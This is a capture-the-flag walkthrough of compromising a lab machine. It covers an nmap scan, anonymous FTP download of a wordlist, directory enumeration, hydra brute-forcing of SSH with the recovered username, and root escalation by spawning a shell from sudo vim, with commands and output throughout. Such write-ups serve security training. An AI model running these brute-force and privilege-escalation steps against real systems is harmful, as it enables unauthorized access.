 ~ nmap -sV -sC -p- 192.168.33.140  -oN ports.log            
 Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 17:17 CST
 Nmap scan report for bogon (192.168.33.140)              
 PORT     STATE SERVICE VERSION
 21/tcp   open  ftp     vsftpd 3.0.3
 | ftp-anon: Anonymous FTP login allowed (FTP code 230)
 | -rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
 |_-rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
 ...
 80/tcp   open  http    Apache httpd 2.4.41 ((Ubuntu))
 | http-robots.txt: 1 disallowed entry
 ...
 7223/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
 ...

Get a dictionary file from the anonymous FTP server.

 ~ ftp 192.168.33.140                                            
 Connected to 192.168.33.140.                                    
 220 (vsFTPd 3.0.3)                                              
 Name (192.168.33.140:kali): anonymous                            
 331 Please specify the password.                                
 Password:                                                        
 230 Login successful.                                            
 Remote system type is UNIX.                                      
 Using binary mode to transfer files.                            
 ftp> ls -la                                                      
 200 PORT command successful. Consider using PASV.                
 150 Here comes the directory listing.                            
 drwxr-xr-x    2 0        118          4096 Jun 19 05:11 .        
 drwxr-xr-x    2 0        118          4096 Jun 19 05:11 ..      
 -rw-r--r--    1 1000     1000           47 Jun 18 17:32 flag1.txt
 -rw-r--r--    1 1000     1000          849 Jun 19 05:11 word.dir
 226 Directory send OK.                                          
 ftp> get word.dir                                                
 local: word.dir remote: word.dir            

Scan port 80 for directories and files.

```
~ gobuster dir -u http://192.168.33.140 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
===============================================================
/index.html           (Status: 200) [Size: 1254]
/robots.txt           (Status: 200) [Size: 70]
/happy                (Status: 200) [Size: 110]
```

Visit /happy and check its source code; it contains the username hackathonll.

```
~ curl http://192.168.33.140/happy
<html>
<title>happy</title>

<body><h1> Nothing is in here</h1></body>

<!-- username: hackathonll >

</html>
```


Brute force SSH with this username and the dictionary file.

~ hydra -l hackathonll -P word.dir 192.168.33.140 -s 7223 ssh -t64 -f
...
[DATA] attacking ssh://192.168.33.140:7223/
[7223][ssh] host: 192.168.33.140 login: hackathonll password: Ti@gO
[STATUS] attack finished for 192.168.33.140 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

Log in over SSH and check sudo -l.

```
~ ssh hackathonll@192.168.33.140 -p 7223
...
$ sudo -l
Matching Defaults entries for hackathonll on hackathon:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User hackathonll may run the following commands on hackathon:
    (root) NOPASSWD: /usr/bin/vim
```

Run vim with sudo, press ":", type "!/bin/bash", and we become root.

```
$ sudo vim

root@hackathon:/home/hackathonll# id
uid=0(root) gid=0(root) groups=0(root)
```